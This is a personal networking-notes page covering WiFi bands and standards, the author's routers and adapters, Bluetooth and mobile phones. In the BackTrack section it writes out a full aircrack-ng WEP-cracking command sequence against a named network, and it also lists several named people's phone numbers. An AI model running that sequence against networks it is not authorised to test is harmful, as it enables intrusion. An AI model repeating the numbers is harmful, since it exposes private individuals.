home / infca / wireless Before you judge a man, try walking in his shoes

Arcadi | Irina | JB Mine + MACs ; band steering; ESP , MTV | wifi4eu | my problems | Links | End | mapa

Xarxes inalàmbriques

 
Dedicat a en Jordi Buzón.
Tú sí que sabes motivarme.
 
go 2 top
WiFi ISM band USR 9106 CN-WF511 Tech stuff Monitoring , Win cmd line scan wifi 4 ESSID Exploit CD Bluetooth, WiFi vs BT Mobils

WiFi

WIFI stands for "wireless fidelity", and is a wireless LAN

2 types of architecture :

IEEE 802.11 is a set of standards for wireless local area network using 2.4 GHz and the 5 GHz spectrum bands

Wi-Fi (Wireless Fidelity) standard

Frequency band : 2,400 - 2,4835 GHz (Industrial Scientific Medical Band).

Arquitectura : get all 802 !

Characteristics

f (bottom of band) = 2,4 GHz => λ = 12,5 cm. f (top of band) = 2,4835 GHz => λ = 12,08 cm.

Legislación española : ver S5.150 en S5_1.doc de Sección III : disposición del cuadro de atribución de bandas de frecuencias. Channel 10-11 (Spain).

A common design for antennas is to make them 1/4 of a wavelength or less in length.

Hardware comparisons : Seattle

Receive sensitivity : FreeNetworks

wireless networks security

Wired Equivalent Privacy (WEP) is a security algorithm for IEEE 802.11 wireless networks

In 2003 the Wi-Fi Alliance announced that WEP had been superseded by Wi-Fi Protected Access (WPA).

WPA2 replaced WPA in 2004

Authentication key distribution :

Encryption protocol

New WEP cracking tools : WEP.HTM

"WPA Cracking" ... "128 Bit WEP cracking" here "The minimum number of characters for a WPA-PSK passphrase is 8. The maximum is 63."

Chez moi :

SSID Security Type Encryption Cipher Aut Radio Type ------ -------------- ----------- ----- ---- ----------- belkin WPA2 AES CCMP PSK 802.11n WPA TKIP PSK 802.11g

Atenció a la seguretat : el AirSnort crakeja les claus d'encriptació ! I el WEPCrack !

ExtremeTech diu :

 WEP (wired-equivalent privacy) = encryption scheme for wireless traffic.
 Tools are readily available to break 40-bit WEP in a few minutes, and 128-bit WEP keys can be broken in a few days.

El AiroPeek (protocol analyzer) preten arreglar-ho.

IBM diu

Existing security for 802.11 wireless consists of two subsystems : a data encryption technique called Wired Equivalent Privacy (WEP) and an authentication method, either Shared Key or 802.1x. Both the encryption and authentication are optional, and wireless access points are typically shipped with both turned off.

I té el DWSA

Un article amb els esencials de la seguretat WiFi casolana.

Wireless A, B, G and N

Norma : 802.11b - 802.11a is used by OTAN in Europe.

IEEE 802.11n is a wireless networking standard created to improve network throughput over the two prior standards : Wireless-G (54 Mbps) or even Wireless-B (11 Mbps).

Wireless-N increased the maximum data transmission rate more than tenfold from 54 Mbps to 600-900 Mbps.

Wifi 802.11x speeds

remember, lower frequency means longer range

IEEE standard / speed / band

802.11a 54 Mbps 5 GHz 802.11b 11 Mbps 2,4 GHz 802.11g 54 Mbps 2,4 GHz 802.11n 600 Mbps 2,4 GHz and 5 GHz 802.11ac 3,46 Gbps 5 GHz 802.11ad 6,7 Gbps 60 GHz, a 3 metres 802.11ah 347 Mbps 900 MHz

wiki 802.11a , speeds

IEEE 802.11 and 2,4 GHz and 5 GHz

The IEEE 802.11 standard defines operation for wireless networks in both the 2,4 GHz and 5 GHz frequency ranges.

802.11a (wiki) - The 802.11a standard uses the same core protocol as the original standard (ratified in 1999), operates in 5 GHz band, and uses a 52-subcarrier orthogonal frequency-division multiplexing (OFDM) with a maximum raw data rate of 54 Mbit/s, which yields realistic net achievable throughput in the mid-20 Mbit/s.

The 2.4 GHz band is used for Wireless-G, and the 5 GHz for Wireless-N only.

2,4 GHz

All of the versions of Wi-Fi up to and including 802.11n (a, b, g, n) operate between the frequencies of 2400 and 2500 MHz. These 100 MHz are separated into 14 channels of 20 MHz each (overlapping).

Each channel number is assigned to that channel’s center frequency (i.e., 2.4 GHz Channel 1 is at 2.412 GHz).

channel Fo MHz Freq range 01 2.412 2401-2423 02 2.417 2406-2428 03 2.422 2411-2433 04 2.427 2416-2438 05 2.432 2421-2443 06 2.437 2426-2448 07 2.442 2431-2453 08 2.447 2436-2458 09 2.452 2441-2463 10 2.457 2446-2468 11 2.462 2451-2473 12 2.467 2456-2478 13 2.472 2461-2483 14 2.484 2473-2495

2.4 GHz only allows for 3 channels without an overlap - these are 1, 6 and 11. See list of WLAN channels

5 GHz

Using the 5 GHz band gives 802.11a a significant advantage, since the 2.4 GHz band is heavily used to the point of being crowded. Degradation caused by such conflicts can cause frequent dropped connections and degradation of service. However, this high carrier frequency also brings a slight disadvantage: the effective overall range of 802.11a is slightly less than that of 802.11b/g; 802.11a signals cannot penetrate as far as those for 802.11b because they are absorbed more readily by walls and other solid objects in their path.

The great thing about 5 GHz (5.170 MHz .. 5.570 MHz, 802.11n and 802.11ac) is that it offers 23 non-overlapping 20 MHz channels because there’s much more free space at the higher frequencies,

This is where the topic of channel width gets interesting. There is significantly more spectrum available in this band, with each channel occupying its own 20MHz non-overlapping slice. As was the case in 2.4, 802.11n gave us the ability to use 40MHz channels. From there, 802.11ac now allows for 80MHz and even 160MHz wide channels! These wide channels are created by bonding 20MHz channels together, again using the center frequency to denote the channel. For example, channels 36 and 40 (each 20MHz) are bound together to make 40MHz channel 38, etc

When setting the channels on your 5 GHz APs, try to stick with 36, 40, 44 and 48

url

2,4 GHz versus 5 GHz

2.4 GHz overview

5 GHz overview

AUTO channel selection

AP and CSA (channel switch announcement) frames

The Channel Switch Announcement element is used by an AP in a BSS, a STA in an IBSS, or a mesh STA in an MBSS to advertise when it is changing to a new channel and the channel number of the new channel.

DFS is a spectrum-sharing mechanism that allows wireless LANs (WLANs) to coexist with radar systems.

If your AP want to use a 5 GHz channel, it need to support Dynamic Frequency Selection (DFS for short). If interference is detected after the AP has started, it sends a Channel Switch Announcement telling the stations that the AP will change channel after the next X beacons. The stations must obey or they will be disconnected.

Tool

A free (guindous) scanner utility is Nirsoft’s WifiInfoView, which doesn’t even require installation. Just unzip and run it, and check out all of the networks using each channel.

Best USB wifi antena

20200628 - antena wifi, Maxesla WiFi Adaptador AC 1200Mbps USB WiFi Receptor Dual Band 2.4G/5GHz

Nuevo modelo : Maxelsa 1.300 Mbps 16 €

Range extender

Si volem tenir una xarxa propia "itinerant" i conectar-nos a Internet només en algun moment, ens cal una configuracio com aquesta, on el punt (1) dificilment pot ser un cable (estem en un hotel) :

xarxa publica <- . -> xarxa privada d'en Albert . -> terminals d'en Albert .---------------. . . | | ​ | | (1) LAN​/WAN .---------------. (2) LAN/WAN .--------. | Router | =======.======= | Router | =====.======= | mac | | hotel | | Albert | | .--------. | (a) | | (b) | | | | .---------------. | .--------. .---------------. .------- | rspi | .--------.

See FastLane !

El problema és que la password de internet proporcionada per el router (a) s'ha de posar manualment a tots els terminals que es conectin al router (b)


ISM bands

The ISM radio bands are portions of the radio spectrum reserved internationally for industrial, scientific and medical (ISM) purposes other than telecommunications.

wikipedia

The nrf24l01 antena operates in 2,4 GHz frequency band (2.400 to 2.525 MHz) and uses GFSK modulation for data transmission.

User can select any channel in the range 0-125

Each channel occupies a bandwidth of less than 1 MHz

So, channel 76 uses a frequency of 2.476 MHz, this is 2.476 GHz


Servidors (Access Point)

Clients : wireless card, tarjes Wi-Fi (802.11b)

Edimax EW-7115U

US Robotics 9106

9106 Specifications [url]

    * Network address translation (NAT)
    * Integrated 802.11g (54Mbps) wireless access point
          o 54Mbps data rate with auto fallback
          o 2 x detachable 2 dBi reverse SMA antennas
          o Support for WEP and WPA-PSK
          o Mac address filtering
          o Disable SSID
    * Integrated ADSL modem - 1 x RJ11 connection - velocitat ?
    * 4 x 10/100Base-T auto MDI-MDIX RJ45 switched LAN ports
    * Built-in firewall with stateful packet inspection (SPI)
    * Integrated DHCP server
    * Virtual private network (VPN) pass-through
    * UPnP enabled
    * DMZ hosting and port forwarding
    * Web-based & remote configuration
    * 2 year manufacturer warranty
 

Homepage

Search for FLOW CONTROL

 El modelo del ADSL Wireless Gateway
 Model 9106 ¢ USR209106
 SN:1DAH2A3D0439

my Wifi routers
MTV, 201512 : Comtrend

5813 foto, manual [default 192.168.1.1, "1234"]

Portal Alejandra - configuración de routers

Admin pwd

100 Mbps

“Wireless -> Advanced“, cambiamos :

url

Fibra Optica
MTV, 201601 : HUAWEI ONT HG 8240

El Echo Life HG8240 es un terminal de red óptica (ONT) para interiores de la solución FTTH Huawei. Con el uso de la tecnología GPON, ofrece acceso de banda ultra-ancha para usuarios residenciales y pequeñas empresas. Proporciona dos puertos POTS y cuatro puertos Ethernet GE/FE de adaptación automática.

Homepage

SAG Belkin N300 wireless N router, model F9K1002v5 (May 2015)

Default values :


Amunt! Top Amunt!
My Wifi cards
Ubuntu

Display what driver am i using :

nicolau@mars:~$ lsusb Bus 008 Device 002: ID 2357:0138 nicolau@mars:~$ lsusb -s 8:2 Bus 008 Device 002: ID 2357:0138 nicolau@mars:~/sebas/_local_tinet_files$ lsusb -s 8:2 -v Bus 008 Device 002: ID 2357:0138 Device Descriptor: bLength 18 bDescriptorType 1 bcdUSB 2.10 bDeviceClass 0 (Defined at Interface level) bDeviceSubClass 0 bDeviceProtocol 0 bMaxPacketSize0 64 idVendor 0x2357 idProduct 0x0138 bcdDevice 2.10 iManufacturer 1 Realtek iProduct 2 802.11ac NIC iSerial 3 123456

Another path :

nicolau@mars:~$ ls /sys/class/net/wlx984827ca1628/device/driver/module/drivers 0 lrwxrwxrwx 1 root root 0 Aug 12 12:56 usb:rtl88x2bu -> ../../../bus/usb/drivers/rtl88x2bu
P4 / Airis : Canyon CN-WF511

Chipset & driver by fabricante : url

Mine : URL

Norma = 802.11g, ID del producto = CN-WF511, Interface = PCI, Chipset = Ralink (chip RT2560F), Driver = rt2x00, Trabaja con Linux = verde.

Comentarios - driver available from manufacturer: http://web.ralinktech.com/ralink/Home/Support/Linux.html
=> http://rt2400.sourceforge.net/
=> http://rt2x00.serialmonkey.com, or http://sourceforge.net/projects/rt2400.

3 fotos :

T42

Ubuntu lspci says : Intel Corp. PRO/Wireless 2200 BG (rev 05)
So, it is a IPW2200 BG card

Norma = 802.11g, ID del producto = 2200BG, Vendedor y código del producto = man:8086 dev:4220, Interface = mini-PCI, Chipset = IPW2200, Driver = ipw2200, Trabaja con Linux = verde
Comentarios : http://ipw2200.sourceforge.net/

[t42:\Fonts\WireLess\Drivers\T42]

T400 (Abr 2010)
Integrated card

XP says : Intel(R) WiFi Link 5100 AGN ; mac = 00:22:FA:D1:5A:90 ; driver = NETw5x32.sys ;

AIR-PCM352 (pcmcia)

XP says : "Cisco Systems 350 Series PCMCIA Wireless Adapter : driver = pcx500.sys ;
soft, download.

Belkin Play N600, model F7D4101v2 (Oct 2014)

Play N600 USB Wireless N Dual Band.

Help (Spain) : 902.02 43 66

ISO (146 MB)


Amunt! Top Amunt!
Tech stuff

dBm vs mW
  dBm  
+ 3dB     log
  mW  
x 2     log
0 1
3 2
6 4
9 8
10 10
12 16
15 32
18 64
20 100
21 128
24 256
27 512
30 1024
30 1000
Pèrdua de senyal a l'espai lliure

 Loss = 32 + 20 x Log ( F x D ) 
  where
 Loss = free space path loss in dB
 F = operating frequency in Mhz
 D = distance in Km
 Include a fade margin of about 10 dB ...

So for a simple example, how far can a pair of Wavelan cards get with the little supplied patch antennas of 8 dbi ? The answer is :

 Tx power = + 20 dbm
 Combined antenna gains = 16 ( 8 + 8 )
 Rx sensitivity = -74 dbm
 Total link budget = 20 + 16 - ( -74 ) = 110 db
 Max distance = 4 km aprox

 loss = 32 + 20 x log (2450 x 4) = 111.

 With 10 dB margin we have :

    100 dB > 32 + 20 x log ( 2450 x d )
     68/20 > log ( 2450 x d )
     10 exp (68/20) / 2450 > d
     d < 1,025 Km

Bluetooth uses 1 mW to reach 10 m [verify]


Vocabulari


Amunt! Top Amunt!
Monitoring wireless LAN
Manage wireless network using windows 10 command line

Resum :

url

scan wifi for ESSIDs

To display the wifi networks around, we can use :

Movistar wifi

No entenc com "a22" apareix en les dues bandes ...

MARS : wlx1cbfcee61e65 Scan completed : Cell 01 - Address: C6:D4:A1:94:F2:EC ESSID:"aa22" Protocol:IEEE 802.11AC Frequency:5.26 GHz (Channel 52) Bit Rates:1.3 Gb/s Quality=79/100 Signal level=-61 dBm Cell 06 - Address: CC:D4:A1:94:F2:E4 ESSID:"aa22" Protocol:IEEE 802.11bgn Frequency:2.412 GHz (Channel 1) Bit Rates:144 Mb/s Quality=100/100 Signal level=-47 dBm Cell 13 - Address: CC:D4:A1:94:F2:EC ESSID:"aa55" Protocol:IEEE 802.11AC Frequency:5.26 GHz (Channel 52) Bit Rates:1.3 Gb/s Quality=69/100 Signal level=-61 dBm
other tools

See Sniffer 4.6 [12 dolars]
AirMagnet Duo complementing Sniffer Wireless article
And Snort for W2K

kismet - a wireless scanner (requires driver in promiscous mode) Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system.

Windows ones :

Read about Anti-Sniff. Also about packets and protocols ! Even points to GG243376 !

In Win2000Mag also ! [NT only !]

 AntiSniff exploits the method NT uses to handle packets by sending a packet to the system
 using an Ethernet address of FF:00:00:00:00:00
 and the IP destination address of the system you want to check.
 When a network card is operating in promiscuous mode in NT,
 it will respond to the packet that AntiSniff has sent,
 revealing that a packet sniffer might be active on the system.

 For its DNS tests, AntiSniff puts itself in promiscuous mode
 and sends a packet out on the network using a predetermined IP address
 in the packet header. If a packet sniffer is listening on the network
 and configured_as some are_to perform reverse
 DNS lookups for the packets it captures, then the system running the
 packet sniffer will transmit a reverse DNS lookup request for the IP
 address in the packet AntiSniff sent.
 The product captures that particular action (the reverse DNS lookup),
 tricking the packet sniffer into revealing itself on the network.

Other network analyzers :

War driving : MacStumbler (Airport wireless cards only)

Read about WEP

wifi tools URLs
Phone
Scan range for alive IPs

c:\> FOR /L %i IN (1,1,255) DO @echo 192.168.1.%i & @ping -n 2 192.168.1.%i -w 900 | find "Reply"
sniffing wifi data

When you're connected to a network HUB via a CAT5 cable, a network interface in promiscuous mode can see ALL the packets echoed by the HUB, not just the packets addressed to that NIC's IP address.

However, when you're "connected" wirelessly (wlan0) each device (laptop, cellphone) has its own radio connection with the wireless AP. The wireless AP doesn't echo (retransmit) other peoples data on your channel.

If your wireless device is capable of "monitor mode" (so it will receive packets on all wireless channels), you could use airmon-ng to set it.

url, airmon-ng

How to know my eth0 interface is in "promiscous mode" ?
Read xarxes.htm

Compte : monitor mode

MARS :

nicolau@mars:~$ wireshark --version Wireshark 2.6.10 (Git v2.6.10 packaged as 2.6.10-1~ubuntu18.04.0) nicolau@mars:~$ sudo add-apt-repository ppa:wireshark-dev/stable nicolau@mars:~$ sudo apt update nicolau@mars:~$ apt list --upgradable Listing... Done libwireshark-data/bionic,bionic 3.2.7-1~ubuntu18.04.0+wiresharkdevstable1 all [upgradable from: 2.6.10-1~ubuntu18.04.0] wireshark/bionic 3.2.7-1~ubuntu18.04.0+wiresharkdevstable1 amd64 [upgradable from: 2.6.10-1~ubuntu18.04.0] wireshark-common/bionic 3.2.7-1~ubuntu18.04.0+wiresharkdevstable1 amd64 [upgradable from: 2.6.10-1~ubuntu18.04.0] wireshark-qt/bionic 3.2.7-1~ubuntu18.04.0+wiresharkdevstable1 amd64 [upgradable from: 2.6.10-1~ubuntu18.04.0] nicolau@mars:~$ sudo apt -y install wireshark nicolau@mars:~$ wireshark --version Wireshark 3.2.7 (Git v3.2.7 packaged as 3.2.7-1~ubuntu18.04.0+wiresharkdevstable1)

Centuriones !
Auditor Security Collection

From remote-exploit

BackTrack is the result of the merging of the two innovative penetration testing live Linux distributions

:
BackTrack download : v3 Beta - 14-12-2007, v4 bt4-beta.iso 02/2009. 2010 new home : http://www.backtrack-linux.org/.

See also WifiSlax (v 3.1, 683 MB, at 2007/12 has kernel 2.6.21.5, meaning no "iwlagn" for T400), KisMet, Stumbler (guindous). Nice Blog.

2017 - now it is Kali

wikipedia

Kernel := 2.6.6 ! [10/01/2005]
MacChanger :

     -s eth0 => 00.02.8A.3C.31.4F
     -s eth1 => 00.09.6B.86.5C.57
     -m => provide New AA.BB.CC.DD.EE.FF

Auditor-200605-02 : !IMPORTANT!!
This version has two different ISO versions, becasue the Intel B and the Intel B/G card drivers IPW2100 and IPW2200 does not work well in cooperation. While B cards does not seem to have a problem, systems with B/G cards (ipw2200) seemed to hang during boot. To overcome this problem (until the drivers are fixed) we release two iso's of the CD to support your needs. If you want to be able to use Auditor Security Collection on a system with an IPW2200 card you need to download the "-no-ipw2100" version of the iso otherwise it will not boot. A system with B card based on IPW2100 will work with it, but no driver will be loaded for the B only card. If you never run it on a System with IPW2200 take the "ipw2100" version, the ipw2100 driver is included in this version.

List of tools.
Device list
Tutorials


BT
BT4

Homepage : http://www.backtrack-linux.org/, but drac is from Legacy Filmworks ! (2014) -> Kali

To start BT4 :

Eines al BT4

Les utilitats que hi ha al BT4 son :

aircrack-ng - airmon-ng - AirSnarf - ASLEAP - Automated LEAP attack tool- tool to Crack Cisco LEAP, August, 2003. SourceForge. Cowpatty - Genpmk - Kismet - Kismet is an 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. url MacChanger -
wifi cards

To display card manufacturer to Linux driver compliance : http://linux-wless.passys.nl/.
How to display vendor & product code :

# lspci -vv | grep Intel {for a PCI card : read here} 00:0b.0 Network controller: Intel Corporation PRO/Wireless 2200BG (rev 05) Subsystem: Intel Corporation: Unknown device 2702 Now, look for the device number: # lspci -n | grep 00:0b.0 00:0b.0 Class 0280: 8086:4220 (rev 05)
Acradi Acer Aspire 5741

$ lspci 03:00.0 Network controller : Broadcom Corporation device 4357 (rev 01) Subsystem : Foxconn International Inc, device E021 Kernel drive in use : wl # lspci -n | grep 03:00.0 03:00.0 0280: 14e4:4357 (rev 01)

BCM page has move to b43 driver page.

When booting BT4, I find

$ cat /var/log/messages | grep Broadcom bt kernel: eth0: Broadcom BCM4357 802.11 Wireless Controller 5.10.91.9

Also I find

$ iwconfig eth0 IEEE802.11bgn ESSID:"" Nickname:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated

No permet ficar-se en mode tafaner :

$ iwconfig eth0 mode monitor SET failed on device eth0: invalid argument.

Pero si es pot configurar si sabem la clau :

$ iwconfig eth0 mode managed
Irina Acer Aspire 6930

$ lspci 07:00.0 Network controller : Intel Corporation, Wireless WiFi Link 5100 Kernel drive in use : iwlagn Kernel modules : iwlagn $ lspci -n | grep 07:00.0 07:00.0 0280: 8086:4232

ipw5100 uses iwlagn driver : green, wlan type := 802.11a/n, vendor & product code := man: 8086 dev: 4237, mini-PCIe.

Al log trobo :

$ cat /var/log/messages bt kernel: iwlagn 0000:07:00.0 Detected Intel Wireless WiFi Link 5100AGN REV=0x54

El nostre device és wlan0 :

$ iwconfig wlan0 IEEE802.11abgn ESSID:"" Mode:Managed Frequency:2.412 GHz Access Point: Not-Associated

El configurem :

$ ifconfig wlan0 down $ macchanger -m 00:11:22:33:44:55 wlan0 Current MAC: 00:21:5d:4c:3e:d0 (unknown) Faked MAC: 00:11:22:33:44:55 (Cimsys Inc) $ iwconfig wlan0 mode monitor $ ifconfig wlan0 up

Anem per feina :

$ airodump-ng wlan0 veure xarxes : WLAN_C5, ch 3, BSSID 00:19:15:4F:92:AA ; $ airodump-ng --channel 3 wlan0 veure nomes dades del canal 3 $ airodump-ng -c 3 -w test -bssid 00:19:15:4F:92:AA wlan0 esperar paquets #Data (no tancar finestra !) $ aireplay-ng -1 0 (-e WLAN_C5) -a 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0 do associate to router $ aireplay-ng -3 -b 00:19:15:4F:92:AA -h 00:11:22:33:44:55 wlan0 entrar pakets per a que #Data pugi mes rapid, fins 10.000 ! $ aircrack-ng -b 00:19:15:4F:92:AA test-01.cap desxifrar : wait "KEY FOUND" $ iwconfig wlan0 mode manakeg key 31:32:33:34:35:36:37:38:39:30:31:32.33 conectar al router amb la clau $ dhcpcd wlan0 get IP $ ifconfig wlan0 display configuration $ ping www.google.es use Internet ;
Misc

BT forums.


WifiSlax


LEAP & ASLEAP

LEAP is ...

Asleap is ... - Automated LEAP attack tool. Another tool : LEAP cracker.

few links : Flim; VT - blog.


Amunt! Top Amunt!
Movistar

Su Movistar Internet incluye:

Preu : 33,8843 €/mes - 11,6500 € (promoción Movistar Internet, durante 12 meses)

Router "equipo para acceso fibra óptica GPT-2541 GNAC 00412926". És un "Mitrastar". Cifrado : WPA2-PSK. Encriptación : AES.
Max clients per xarxa = 64

W500 can connect to MOVISTAR_PLUS_BCD1 at 5 GHz.

configuracio

IP = 192.168.1.1 DHCP : [192.168.1.33 .. 192.168.1.199]
seguiment myIP i velocitat a Movistar

SpeedTest o WhatIsMyIP o IPinfo diu :

20160318 - 88.1.200.218 20160319 - 83.50.48.155 20160402 - 88.7.220.132 20160410 - 88.7.220.132 20160425 - 88.7.220.132 20160516 - 88.16.67.1 {returning to enxaneta from wlangas2} 20160529 - 88.16.67.1 20160606 - 88.17.57.125 20160608 - 88.7.181.116 20160705 - 88.7.181.116 20160711 - 88.17.57.34 20160719 - 88.18.117.86 20161024 - 79.145.34.176 [73 Mbps de baixada, 32 de pujada] 20161028 - 79.145.34.176 {via Android !!! ???} 20161130 - 81.36.227.226 20170201 - 83.40.226.198 20170622 - 83.32.249.161, 118 Mbps down, 188 Mbps up 20170821 - 2.138.8.221, 98/96 {wifi "enx"} - 170/180 {wifi bcd1} - 281/283 {cable} 20171022 - 83.37.66.173 : enx 88/100, plus 206/233, cable 308/309
Trassa
c:\> tracert -d 1.2.3.4 {PLUS_BCD1} Tracing route to 1.2.3.4 over a maximum of 30 hops 1 183 ms 1 ms 2 ms 192.168.1.1 2 206 ms 2 ms 2 ms 10.139.130.97 3 216 ms * 8 ms 172.25.66.1 4 234 ms 5 ms 4 ms 172.25.51.178 5 25 ms 12 ms 13 ms 192.168.4.1 6 * * * Request timed out. 7 32 ms 9 ms 7 ms 80.58.67.116 8 216 ms 9 ms 10 ms 80.58.118.249 9 * * * Request timed out. C:\> tracert -d 1.2.3.4 {BCD1} Tracing route to 1.2.3.4 over a maximum of 30 hops 1 2 ms 2 ms 3 ms 192.168.1.1 2 42 ms 5 ms 4 ms 192.168.144.1 3 7 ms 7 ms 6 ms 80.58.121.233 81.46.131.33 {20160402} 81.46.112.173 {20161130} 4 * * * Request timed out.
Administració router
Restaurar a valores de fábrica

Con el router encendido, presionar el botón Reset (último a la derecha por detrás) durante al menos 10 segundos. Transcurridos 90 segundos, el router tendrá los valores de fábrica de nuevo.


Appendix: 802.11b demystified

BSS = Basic Service Set
A cell of stations which may or may not have an access point. A "coordination function" acts as collision detection.

IBSS = Independent Basic Service Set
A self-contained BSS with no access point, one of the members can assume the "coordination function". This is the 802.11 peer-to-peer mode of operation also known as Ad-Hoc mode. Only one wireless "cell" is supported for each different SSID. All communication is done from Client to Client without the use of an Access Point. Clients use the same SSID for establishing the wireless connection.

SSID = Service Set Identifier
A 32 octet-long network name; exactly one per ESS or IBSS.

Infrastructure mode = Managed mode
This mode of operation requires the presence of an 802.11 Access Point. All communication is done via the Access Point which relays packets to other wireless Clients in the BSS as well as to nodes on a wired network such as Ethernet.

ESS = Extended Service Set
A set of one or more interconnected BSSes. All traffic flows through an access point.

BSSID
6 octet cell identifier for a BSS. Value is the same as access point MAC address. Used in iwconfig for the cell value.

Origin URL  



Amunt! Top Amunt!
Bluetooth
Bluetooth between TV and mobile

Per veure els missatge intercanviats entre TV i mobil ...

Esto se conoce como registro de depuración de Bluetooth.
Si tu TV utiliza el sistema operativo Android TV, existe una forma de acceder a este tipo de información. Este proceso implica activar el "Modo de desarrollador" y luego la opción de registro de Bluetooth.


Una vez activada, la TV comenzará a guardar todos los paquetes de datos de la conexión Bluetooth en un archivo de registro, generalmente en la ruta /sdcard/btsnoop_hci.log o /data/misc/bluetooth/logs/.
Despues hay que extraer el rchivo de la TV, lo que requiere el uso de una herramienta como ADB (Android Debug Bridge), a la que solo se puede acceder conectando la TV a un ordenador.
Una vez que tengas el archivo de registro en tu ordenador, podrás abrirlo con un programa especializado en análisis de tráfico de red, como Wireshark. Este programa te mostrará un desglose detallado de todos los eventos de la conexión Bluetooth, incluyendo los intentos de conexión, los paquetes de datos y los errores.
Bluetooth scanner

A Bluetooth scanner for Linux is a tool that detects and analyzes Bluetooth devices in the vicinity.

Popular options include

Bluetooth versus wifi
wifi specs

2.462.000 KHz = 2.462 MHz = 2,462 GHz

wiki wifi

bluetooth specs

A Bluetooth device playing the role of the "master" can communicate with up to 7 devices playing the role of the "slave". This network of "group of up to 8 devices" (1 master + 7 slaves) is called a piconet.
Every device has a unique 48-bit address. Every device also has a 24-bit class identifier.

The protocol operates in the license-free ISM band at 2,45 GHz. In order to avoid interfering with other protocols which use the 2,45 GHz band, the Bluetooth protocol divides the band into 79 channels (each 1 MHz wide) and changes channels up to 1600 times per second. Implementations with versions 1.1 and 1.2 reach speeds of 723.1 kbit/s. Version 2.0 implementations feature Bluetooth Enhanced Data Rate (EDR), and thus reach 2.1 Mbit/s.
Technically version 2.0 devices have a higher power consumption, but the three times faster rate reduces the transmission times, effectively reducing consumption to half that of 1.x devices (assuming equal traffic load).

wiki

how bluetooth works

One of the ways Bluetooth devices avoid interfering with other systems is by sending out very weak signals of about 1 milliwatt ...
Bluetooth can connect up to eight devices simultaneously ...
Bluetooth uses a technique called spread-spectrum frequency hopping that makes it rare for more than one device to be transmitting on the same frequency at the same time. In this technique, a device will use 79 individual, randomly chosen frequencies within a designated range, changing from one to another on a regular basis. In the case of Bluetooth, the transmitters change frequencies 1,600 times every second, meaning that more devices can make full use of a limited slice of the radio spectrum. Since every Bluetooth transmitter uses spread-spectrum transmitting automatically, it's unlikely that two transmitters will be on the same frequency at the same time. This same technique minimizes the risk that portable phones or baby monitors will disrupt Bluetooth devices, since any interference on a particular frequency will last only a tiny fraction of a second.
When Bluetooth-capable devices come within range of one another, an conversation takes place to determine whether they have data to share or whether one needs to control the other. Once the conversation has occurred, the devices form a network. Bluetooth systems create a personal-area network (PAN), or piconet, that may fill a room or may encompass no more distance than that between the cell phone on a belt-clip and the headset on your head. Once a piconet is established, the members randomly hop frequencies in unison so they stay in touch with one another and avoid other piconets that may be operating in the same room.

How stuff works

Bluetooth differs from Wi-Fi

Wifi provides higher throughput and covers greater distances but requires more expensive hardware and higher power consumption. They use the same frequency range, but employ different multiplexing schemes.

While Bluetooth is a cable replacement for a variety of applications, Wi-Fi is a cable replacement only for local area network access.

A glib summary is that Bluetooth is wireless USB, whereas Wi-Fi is wireless Ethernet, both operating at much lower bandwidth than the cable systems they are trying to replace.

In Bluetooth modulation technique is GFSK (Gaussian frequency shift keying).
In WiFi modulation technique is OFDM (Orthogonal Frequency Division Multiplexing) and QAM (Quadrature Amplitude Modulation).

geeks

Bluetooth links


Mòbils

Amunt! Top Amunt!
  • Estandards
    • GSM
      Com va ? El canvi de frequencies en canviar de cel.lula ? El Roaming ?
      Teleco info, good intro.
      Com es fa una recàrrega ?
      • as CORTIX : arriba un missatge !
      • as usual : buy a card and enter the (large) code. Is anything sent before "saldo" is updated ?

      Com puc consultar el meu saldo per Internet ?

    • GPRS [General Packet Radio Service]

    • UMTS [Universal Mobile Telecommunications System]  
      Telefonia móvil de tercera generación.
      • España
        • Telefónica
        • Vodafone
        • Amena Auna - Oct 2004
        • Xfera
      • Francia
        • Orange (France Telecom)
        • SFR (Vivendi)
      • Alemania
        • T-Mobile (Deutsche Telekom)
        • Vodafone
        • Mobil COm (France Telecom)
        • 3G (Telefonica/Sonera)
        • E-Plus (KPN)
      • Italia
        • Telecom Italia Mobile
        • Omnitel (Vodafone)
        • Wind (France Telecom)
        • Telefonica PSE
        • Andala
      • Reino Unido
        • Vodafone [CDM ???]
        • TIW
        • Orange
        • British Telecom
        • Onezone
    • HDSPA (Feb 2006)

  • USA (millones de clientes)
    • Verizon Wireless : 36
    • Cingular : 23,4 [GSM] (1) unides el 18/Feb/2004
    • AT&T wireless : 21,9 [GSM] (1)
    • Sprint : 15,5
    • Nextel : 12,3
    • T-mobile : 12,1

  • Operadors mundials [9/3/2004]
    1. China Mobile
    2. Vodaphone
    3. China Unicom
    4. TEM + BSLA : 62,5 millons
    5. T-Mobile
    6. Orange
    7. NTT DoComo
    8. Cingular + AT&T Wireless

  • alliberació

  • IMEI : Enter *#06# on your phone's key pad and the 15 digit number will be displayed on the screen.

  • Com es fa : vaig al CORTIX, em cobren uns diners, envien un SMS dient que tinc mes saldo. El saldo es a la tarjeta o a la central ?

  • Com es passa l'agenda del mobil al PC i al inrevés ?
    CF62 - easy : use Siemens Data Suite [18,7 MB]
    Cable :
    • conexion to COM port : DCA-500
    • conexion to USB port : DCA-510

    f:\miscosas\CF62 !

 


  • Ionna : 666.36.38.42 - Siemens C45.

  • Nico : 670.85.84.98 - Siemens C45.

    2-on : 66666.38.59 - Siemens SL-55

  • Arcadi : 66.10.66.400 - Nokia 5140

  • CF62 - Siemens : 667.33.88.59

  • V3 - Motorola : 677.65.86.99

http://www.my-siemens.com

http://www.vidisa.es


Configuring an Access Point as a wireless repeater

Read Link Sys


Dubtes

Differences :

See BT4 and wiki.

Seguretat & WiFi & jerga
Wireless security type : Use 802.1x EAP Cisco (LEAP) + data encryption = TKIP.

802.1x, EAP.


Amunt! Top Amunt!
Wifi chez-moi

Recorda el my fwd ports at duckdns !!!

Al ZTE de Masmovil, es poden veure les IPs assignades per DHCP mitjançant "Local Network" + "LAN" + "IPv4"

Per saber la MAC de una IP, engeguem un "ping" a la IP i fem :

nicolau@mars:~$ ip neigh 192.168.1.35 dev wlx984827ca1628 lladdr a8:9c:ed:ba:06:44 REACHABLE -> es el Mi9

Exemple :

